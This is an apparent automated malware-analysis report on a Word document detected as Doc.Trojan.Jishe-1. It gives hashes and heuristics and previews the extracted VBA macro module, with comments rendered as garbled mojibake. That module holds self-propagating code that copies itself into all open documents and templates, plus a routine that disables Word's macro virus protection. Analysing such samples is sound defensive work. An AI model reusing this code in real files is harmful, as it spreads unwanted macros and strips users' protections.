Office (OLE) malware analysis — malicious · 12c760ee5ffc262e

MALICIOUS

Office (OLE)

83.5 KB Created: 2001-06-19 07:41:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: 4e9d1a09563e3eb81dd5cd4d5037fb2b SHA-1: ff32e1fa724e5a6ee52c3400aa8b4f4e1cf8ff6d SHA-256: 12c760ee5ffc262eb44c164153deadd0605922646cdb78514838701e77e623b0

80 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic

The file is identified as malicious by ClamAV with the signature 'Doc.Trojan.Jishe-1'. Static analysis revealed the presence of VBA macros. The extracted VBA script, named 'macros.bas', contains functions like 'InfectAll' and 'ClearVirus' which indicate an intent to infect other documents and templates. The script also contains an email address, 'club@263.net', which may be a contact for the malware author or a command and control channel.

Heuristics 2

ClamAV: Doc.Trojan.Jishe-1 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Jishe-1
VBA macros detected medium OLE_VBA_MACROS

Document contains VBA macro code

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 32314 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	32314 bytes
SHA-256: `96351818b6297f0f2285aab391e9fb2d73da08031eab6ac21ca23a42e41c6195`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "JiShenhua" 'ÕâÊÇ±¾ÈËÑ§Ï°ÖÆ×÷µÄÒ»¸öºê²¡¶¾·ÀÉ±³ÌÐò,Ëü¿ÉÒÔ·ÀÖ¹²¿·ÖWORDºê²¡¶¾µÄ¸ÐÈ¾ 'ÕâÐèÒªÓÐ´óÁ¿µÄºê²¡¶¾ÌØÕ÷Âë×÷ÎªÒÀ¾Ý,Èç¹ûÄã·¢ÏÖÓÐ±¾ÒßÃçÎÞÄÜÎªÁ¦µÄºê²¡¶¾ '¸ÐÐ»Äú¼°Ê±ÓëÎÒÁªÏµ,ÄãÒ²¿ÉÒÔ×ÔÑ¡ÐÞ¸Ä±¾³ÌÐò,ÒÔ¼ÓÇ¿±¾ÒßÃçµÄ¹¦Á¦ 'Óë²¡¶¾×÷¶·Õù¾ÍÈçÍ¬µÖÓùÉç»á·¸×ï,ÐèÒª´ó¼ÒµÄ¹²Í¬Å¬Á¦ '»¶Ó¼ÓÈëÆäÖÐ²¢³ÉÎªÒ»ÃûÕ½Ê¿,Ò²ÐíÄãÕýÊÇ´ó¼ÒÆÚ´ýÒÑ¾ÃµÄÓÂÊ¿ '³ÌÐòÉè¼Æ: ¼½É÷»ª '°ì¹«µç»°: 'ÒÁÃÃµØÖ·: club@263.net Option Explicit '³ÌÐòÖÐµÄ±äÁ¿±ØÐëÏÈ¶¨ÒåºóÊ¹ÓÃ Public pVirusReport As String '²¡¶¾ÃèÊöÐÅÏ¢ Private Const cMyID As String = "MyMacroVirusKillerV2.0" '±¾³ÌÐò´úÂë±êÖ¾ Private Const cMyModule As String = "JiShenhua" '±¾³ÌÐòµÄÄ£¿éÃû³Æ Private Const cMyUserForm As String = "VirusReport" '±¾³ÌÐòµÄÓÃ»§´°¿ÚÃû³Æ Private Const cOK As Integer = 0 'Ò»ÇÐÕý³£ Private Const cDocHasModuleElse As Integer = 1 'ÓÐÆäËûÄ£¿é´æÔÚ Private Const cDocHasCodeElse As Integer = 2 'ÔÚThisDocumentÄ£¿éÖÐÓÐÆäËû´úÂë´æÔÚ Private Const cDocHasAllElse As Integer = 3 'ÔÚThisDocumentÄ£¿éÖÐÓÐÆäËû´úÂë´æÔÚ£¬²¢ÓÐÆäËûÄ£¿é´æÔÚ Private Const cDocProtected As Integer = 4 '¸ÃÎÄµµ±»±£»¤ '´ÓÖ¸¶¨ÎÄ¼þÖÐÏòËùÓÐ´ò¿ªÎÄµµ¼°Ä£°åÖÐ¸´ÖÆ±¾³ÌÐò´úÂë¼°Ä£¿é Public Function InfectAll() As Boolean Dim myDoc As Document, myTemp As Template 'Ïò´ò¿ªµÄÎÄµµÖÐÐ´Èë±¾´úÂë For Each myDoc In Documents Infect myDoc Next myDoc 'ÏòWORDÄ£°åÖÐÐ´Èë±¾´úÂë For Each myTemp In Templates Infect myTemp Next myTemp InfectAll = True End Function 'Çå³ýËùÓÐ´ò¿ªÎÄµµ¼°Ä£°åÖÐµÄ²¡¶¾Ä£¿é¼°´úÂë Public Function ClearVirus() As Boolean Dim i As Integer Dim myDoc As Document, myTemp As Template Dim Cleared As Boolean ClearVirus = True '¼ì²éËùÓÐÎÄµµ²¢Çå³ý For Each myDoc In Documents Cleared = ClearDocument(myDoc) If Not Cleared Then MsgBox "²¡¶¾Çå³ý¹¤×÷²»³É¹¦£¬Çë¼ì²éÔÒò¡£", vbOKOnly, myDoc.Name ClearVirus = False End If Next myDoc '¼ì²éËùÓÐÄ£°å²¢Çå³ý For Each myTemp In Templates Cleared = ClearDocument(myTemp) If Not Cleared Then MsgBox "²¡¶¾Çå³ý¹¤×÷²»³É¹¦£¬Çë¼ì²éÔÒò¡£", vbOKOnly, myTemp.Name ClearVirus = False End If Next myTemp End Function '¼ì²éËùÓÐ´ò¿ªµÄÎÄµµ¼°Ä£°åÖÐÊÇ·ñÓÐ²¡¶¾´æÔÚ£¬Èç¹ûÓÐ£¬·µ»Ø²¡¶¾ÐÅÏ¢ÃèÊö×Ö·û´® Public Function ScanVirus() As Boolean Dim DocsCount As Integer, i As Integer, ret As Integer Dim myStr As String Dim myDoc As Document, myTemp As Template ScanVirus = False pVirusReport = "" '¼ì²éËùÓÐ´ò¿ªµÄÎÄµµÖÐÊÇ·ñÓÐ²¡¶¾ For Each myDoc In Documents ret = ScanDocument(myDoc) Select Case ret Case cOK, cDocProtected Case cDocHasModuleElse, cDocHasCodeElse, cDocHasAllElse ScanVirus = True Case Else MsgBox "º¯ÊýScanDocument·µ»Ø´íÎó´úÂë£¬ÏµÍ³ÎÞ·¨Ê¶±ð¡£", vbOKOnly, "ÏµÍ³³ö´í" End Select Next myDoc '¼ì²éËùÓÐÄ£°å For Each myTemp In Templates ret = ScanDocument(myTemp) Select Case ret Case cOK, cDocProtected Case cDocHasModuleElse, cDocHasCodeElse, cDocHasAllElse ScanVirus = True Case Else MsgBox "º¯ÊýScanDocument·µ»Ø´íÎó´úÂë£¬ÏµÍ³ÎÞ·¨Ê¶±ð¡£", vbOKOnly, "ÏµÍ³³ö´í" End Select Next myTemp End Function '¹Ø±ÕWordºê²¡¶¾±£»¤¹¦ÄÜ Public Function CloseVirusProtection(Optional Protected As Boolean = False) Options.VirusProtection = Protected End Function '°Ñ±¾³ÌÐò´úÂë´ÓÒ»¸öÎÄ¼þ¸´ÖÆµ½ÁíÒ»¸öÎÄ¼þÖÐ Private Function Infect(TargetFile) As Boolean Dim xItem, CommandStr As String, file As String Dim myDoc As Document, myTemp As Template Dim LinesofCode As Long, myStr As String '¼ì²é²ÎÊýÀàÐÍÊÇ·ñÕýÈ· myStr = TypeName(TargetFile) If myStr <> "Document" And myStr <> "Template" Then MsgBox "Ê¹ÓÃÊý¾ÝÀàÐÍ" + myStr + "µ÷ÓÃº¯ÊýInfect£¬ÏµÍ³Ö»ÔÊÐíÊ¹ÓÃDocument¼°TemplateÀàÐÍ¡£", vbOKOnly, "ÏµÍ³´íÎó" Infect = False Exit Function End If Infect = True If TargetFile.Name = ThisDocum ... (truncated)

SHA-256: 96351818b6297f0f2285aab391e9fb2d73da08031eab6ac21ca23a42e41c6195

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "JiShenhua"
'ÕâÊÇ±¾ÈËÑ§Ï°ÖÆ×÷µÄÒ»¸öºê²¡¶¾·ÀÉ±³ÌÐò,Ëü¿ÉÒÔ·ÀÖ¹²¿·ÖWORDºê²¡¶¾µÄ¸ÐÈ¾
'ÕâÐèÒªÓÐ´óÁ¿µÄºê²¡¶¾ÌØÕ÷Âë×÷ÎªÒÀ¾Ý,Èç¹ûÄã·¢ÏÖÓÐ±¾ÒßÃçÎÞÄÜÎªÁ¦µÄºê²¡¶¾
'¸ÐÐ»Äú¼°Ê±ÓëÎÒÁªÏµ,ÄãÒ²¿ÉÒÔ×ÔÑ¡ÐÞ¸Ä±¾³ÌÐò,ÒÔ¼ÓÇ¿±¾ÒßÃçµÄ¹¦Á¦
'Óë²¡¶¾×÷¶·Õù¾ÍÈçÍ¬µÖÓùÉç»á·¸×ï,ÐèÒª´ó¼ÒµÄ¹²Í¬Å¬Á¦
'»¶Ó¼ÓÈëÆäÖÐ²¢³ÉÎªÒ»ÃûÕ½Ê¿,Ò²ÐíÄãÕýÊÇ´ó¼ÒÆÚ´ýÒÑ¾ÃµÄÓÂÊ¿
'³ÌÐòÉè¼Æ: ¼½É÷»ª
'°ì¹«µç»°:
'ÒÁÃÃµØÖ·: club@263.net
Option Explicit '³ÌÐòÖÐµÄ±äÁ¿±ØÐëÏÈ¶¨ÒåºóÊ¹ÓÃ
Public pVirusReport As String '²¡¶¾ÃèÊöÐÅÏ¢
Private Const cMyID As String = "MyMacroVirusKillerV2.0" '±¾³ÌÐò´úÂë±êÖ¾
Private Const cMyModule As String = "JiShenhua" '±¾³ÌÐòµÄÄ£¿éÃû³Æ
Private Const cMyUserForm As String = "VirusReport" '±¾³ÌÐòµÄÓÃ»§´°¿ÚÃû³Æ
Private Const cOK As Integer = 0 'Ò»ÇÐÕý³£
Private Const cDocHasModuleElse As Integer = 1 'ÓÐÆäËûÄ£¿é´æÔÚ
Private Const cDocHasCodeElse As Integer = 2 'ÔÚThisDocumentÄ£¿éÖÐÓÐÆäËû´úÂë´æÔÚ
Private Const cDocHasAllElse As Integer = 3 'ÔÚThisDocumentÄ£¿éÖÐÓÐÆäËû´úÂë´æÔÚ£¬²¢ÓÐÆäËûÄ£¿é´æÔÚ
Private Const cDocProtected As Integer = 4 '¸ÃÎÄµµ±»±£»¤
'´ÓÖ¸¶¨ÎÄ¼þÖÐÏòËùÓÐ´ò¿ªÎÄµµ¼°Ä£°åÖÐ¸´ÖÆ±¾³ÌÐò´úÂë¼°Ä£¿é
Public Function InfectAll() As Boolean
    Dim myDoc As Document, myTemp As Template
    'Ïò´ò¿ªµÄÎÄµµÖÐÐ´Èë±¾´úÂë
    For Each myDoc In Documents
        Infect myDoc
    Next myDoc
    'ÏòWORDÄ£°åÖÐÐ´Èë±¾´úÂë
    For Each myTemp In Templates
        Infect myTemp
    Next myTemp
    InfectAll = True
End Function
'Çå³ýËùÓÐ´ò¿ªÎÄµµ¼°Ä£°åÖÐµÄ²¡¶¾Ä£¿é¼°´úÂë
Public Function ClearVirus() As Boolean
    Dim i As Integer
    Dim myDoc As Document, myTemp As Template
    Dim Cleared As Boolean

    ClearVirus = True
    '¼ì²éËùÓÐÎÄµµ²¢Çå³ý
    For Each myDoc In Documents
        Cleared = ClearDocument(myDoc)
        If Not Cleared Then
            MsgBox "²¡¶¾Çå³ý¹¤×÷²»³É¹¦£¬Çë¼ì²éÔÒò¡£", vbOKOnly, myDoc.Name
            ClearVirus = False
        End If
    Next myDoc
    '¼ì²éËùÓÐÄ£°å²¢Çå³ý
    For Each myTemp In Templates
        Cleared = ClearDocument(myTemp)
        If Not Cleared Then
            MsgBox "²¡¶¾Çå³ý¹¤×÷²»³É¹¦£¬Çë¼ì²éÔÒò¡£", vbOKOnly, myTemp.Name
            ClearVirus = False
        End If
    Next myTemp
End Function
'¼ì²éËùÓÐ´ò¿ªµÄÎÄµµ¼°Ä£°åÖÐÊÇ·ñÓÐ²¡¶¾´æÔÚ£¬Èç¹ûÓÐ£¬·µ»Ø²¡¶¾ÐÅÏ¢ÃèÊö×Ö·û´®
Public Function ScanVirus() As Boolean
    Dim DocsCount As Integer, i As Integer, ret As Integer
    Dim myStr As String
    Dim myDoc As Document, myTemp As Template
    
    ScanVirus = False
    pVirusReport = ""
    '¼ì²éËùÓÐ´ò¿ªµÄÎÄµµÖÐÊÇ·ñÓÐ²¡¶¾
    For Each myDoc In Documents
        ret = ScanDocument(myDoc)
        Select Case ret
            Case cOK, cDocProtected
            Case cDocHasModuleElse, cDocHasCodeElse, cDocHasAllElse
                ScanVirus = True
            Case Else
                MsgBox "º¯ÊýScanDocument·µ»Ø´íÎó´úÂë£¬ÏµÍ³ÎÞ·¨Ê¶±ð¡£", vbOKOnly, "ÏµÍ³³ö´í"
        End Select
    Next myDoc
    '¼ì²éËùÓÐÄ£°å
    For Each myTemp In Templates
        ret = ScanDocument(myTemp)
        Select Case ret
            Case cOK, cDocProtected
            Case cDocHasModuleElse, cDocHasCodeElse, cDocHasAllElse
                ScanVirus = True
            Case Else
                MsgBox "º¯ÊýScanDocument·µ»Ø´íÎó´úÂë£¬ÏµÍ³ÎÞ·¨Ê¶±ð¡£", vbOKOnly, "ÏµÍ³³ö´í"
        End Select
    Next myTemp
End Function
'¹Ø±ÕWordºê²¡¶¾±£»¤¹¦ÄÜ
Public Function CloseVirusProtection(Optional Protected As Boolean = False)
    Options.VirusProtection = Protected
End Function
'°Ñ±¾³ÌÐò´úÂë´ÓÒ»¸öÎÄ¼þ¸´ÖÆµ½ÁíÒ»¸öÎÄ¼þÖÐ
Private Function Infect(TargetFile) As Boolean
    Dim xItem, CommandStr As String, file As String
    Dim myDoc As Document, myTemp As Template
    Dim LinesofCode As Long, myStr As String
    
    '¼ì²é²ÎÊýÀàÐÍÊÇ·ñÕýÈ·
    myStr = TypeName(TargetFile)
    If myStr <> "Document" And myStr <> "Template" Then
        MsgBox "Ê¹ÓÃÊý¾ÝÀàÐÍ" + myStr + "µ÷ÓÃº¯ÊýInfect£¬ÏµÍ³Ö»ÔÊÐíÊ¹ÓÃDocument¼°TemplateÀàÐÍ¡£", vbOKOnly, "ÏµÍ³´íÎó"
        Infect = False
        Exit Function
    End If
    Infect = True
    If TargetFile.Name = ThisDocum
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.